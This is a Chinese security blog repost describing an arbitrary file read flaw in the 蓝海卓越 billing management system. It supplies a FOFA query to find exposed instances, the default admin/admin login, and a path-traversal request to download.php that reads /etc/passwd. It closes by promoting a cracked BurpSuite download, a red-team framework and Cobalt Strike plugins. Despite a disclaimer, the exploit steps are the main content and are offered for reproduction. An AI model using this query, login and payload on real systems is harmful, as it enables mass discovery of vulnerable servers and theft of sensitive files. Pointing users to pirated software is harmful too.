蓝海卓越计费管理系统任意文件读取漏洞

admin 2023年6月16日02:43:16评论45 views字数 636阅读2分7秒阅读模式

今日,宜小酌

声明

 

本文章仅用于交流学习,请勿使用该方法进行违法活动,谢谢!

(如使用此方法进行违法活动与作者无关)

PS:文末工具推送~


漏洞描述


    蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件


漏洞影响


蓝海卓越计费管理系统


漏洞复现

1)FOFA

title=="蓝海卓越计费管理系统"

蓝海卓越计费管理系统任意文件读取漏洞

2)登录界面

蓝海卓越计费管理系统任意文件读取漏洞

3)默认口令 admin/admin,登录后界面如下

蓝海卓越计费管理系统任意文件读取漏洞

4)出现漏洞的文件为 download.php,构造POC如下

GET /download.php?file=../../../../../etc/passwd

蓝海卓越计费管理系统任意文件读取漏洞

5)成功读取passwd文件,内容如下。

蓝海卓越计费管理系统任意文件读取漏洞


工具推送


1)BurpSuite2021.5最新破解版、免装java环境.直接启动。

https://cloud.189.cn/t/IF7JBjjMNB7百度链接:https://pan.baidu.com/s/1Gta8GEeDNVNkyJxIG3VIEw提取码:iguo

蓝海卓越计费管理系统任意文件读取漏洞

2)红队渗透测试框架

https://github.com/Lucifer1993/SatanSword

蓝海卓越计费管理系统任意文件读取漏洞

3)适用于Cobalt Strike的插件

https://github.com/z1un/Z1-AggressorScripts

蓝海卓越计费管理系统任意文件读取漏洞




- - - - - - - - - - - - - - - END - - - - - - - - - - - - - - -

点关注,不迷路

原文始发于微信公众号(五六七安全团队):蓝海卓越计费管理系统任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月16日02:43:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蓝海卓越计费管理系统任意文件读取漏洞http://cn-sec.com/archives/1030764.html

发表评论

匿名网友 填写信息